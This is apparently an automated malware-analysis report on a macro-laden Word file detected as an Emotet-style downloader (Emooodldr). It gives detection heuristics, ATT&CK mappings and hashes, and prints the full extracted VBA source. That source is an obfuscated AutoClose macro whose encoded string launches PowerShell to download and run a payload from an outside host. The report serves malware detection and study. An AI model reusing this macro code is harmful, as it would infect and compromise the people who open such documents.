MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is identified as malicious by ClamAV with the signature Doc.Malware.Emooodldr-6711604-0. It contains VBA macros, including an Auto_Close macro, which utilizes the Shell() function. This indicates the macro is designed to download and execute a secondary payload, a common characteristic of the Emooodldr family.
Heuristics 5
-
ClamAV: Doc.Malware.Emooodldr-6711604-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
-
VBA project inside OOXML medium 2 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3712 bytes |
SHA-256: dc2ddb33b36470bb60dd1b1d995330aa3fba638523b39c3f553cd302a855c8dc |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Public Function rezonear(enigmista As String)
Dim iris As String
Dim ursulina As Integer
iris = "ABCDE"
For ursulina = 1 To 5
If Mid(iris, ursulina, 1) = enigmista Then
rezonear = ursulina - 1
End If
Next
End Function
Public Function daiquiri()
Dim juliano
juliano = ""
juliano = "ut|jwxmjqq3j}"
juliano = juliano & "j%2stu%2J}jh%"
juliano = juliano & "G~ufxx%2Htrrf"
juliano = juliano & "si%-Sj|2Tgojh"
juliano = juliano & "y%X~xyjr3Sjy3"
juliano = juliano & "\jgHqnjsy.3It"
juliano = juliano & "|sqtfiKnqj-,m"
juliano = juliano & "yyu?44wttygtq"
juliano = juliano & "ip3ytu4firns3"
juliano = juliano & "umuDkB6,1%)js"
juliano = juliano & "{?FUUIFYF%0%,"
juliano = juliano & "aFR]p3j}j,.@%"
juliano = juliano & "Xyfwy2Uwthjxx"
juliano = juliano & "%)js{?FUUIFYF"
juliano = juliano & ",aFR]p3j}j,@%"
daiquiri = juliano
End Function
Public Function hexagono(alvura As Integer, facultativo As Integer) As Integer
hexagono = Int(alvura - facultativo - 1)
End Function
Public Function sais(medusa As String, rugoso As Integer) As String
Dim axiomatico As Integer
Dim olhos As String
olhos = medusa
Dim viavel As Integer
viavel = 0
For axiomatico = Len(medusa) To rugoso - 1
If viavel = Len(medusa) Then
viavel = 0
End If
olhos = olhos & Mid(medusa, viavel + 1, 1)
viavel = viavel + 1
Next
sais = olhos
End Function
Public Function tolueno(emfa As String, moagem As String) As String
moagem = sais(moagem, Len(emfa))
Dim ronronar
Dim clitoris As Integer
Dim sapo As Integer
Dim cobrir As String
cobrir = ""
For ronronar = 1 To Len(emfa)
clitoris = rezonear(Mid(moagem, ronronar, 1))
sapo = Asc(Mid(emfa, ronronar, 1))
cobrir = cobrir & Chr(hexagono(sapo, clitoris)) & "#"
Next
tolueno = cobrir
End Function
Public Function ruela(virus As String)
Shell virus, (vbNormal)
End Function
Public Function bojudo(harpista As String)
harpista = Replace(harpista, "#", "")
Call ruela(harpista)
End Function
Sub AutoClose()
Dim deltoide As String
deltoide = "EE"
Application.Run "bojudo", tolueno(daiquiri() & "", deltoide)
End Sub
Attribute VB_Name = "Module1"
Attribute VB_Name = "Module2"
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{22E97089-54A0-4344-BC1C-5C0F8DF41418}{D4C1F57E-FB22-4776-9D14-2D7E4EFBE984}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{887F06FC-A68E-4ED3-BE65-9A3F8E86D9E4}{A6B78B68-11BB-4570-AF57-3F38E30A2C68}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 24064 bytes |
SHA-256: 2de5c0d04bcdf6e84ec7d83a49addae911cb87a9e5b79e0323c13e5d6c91cd17 |
|||
|
Detection
ClamAV:
Doc.Malware.Emooodldr-6711604-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.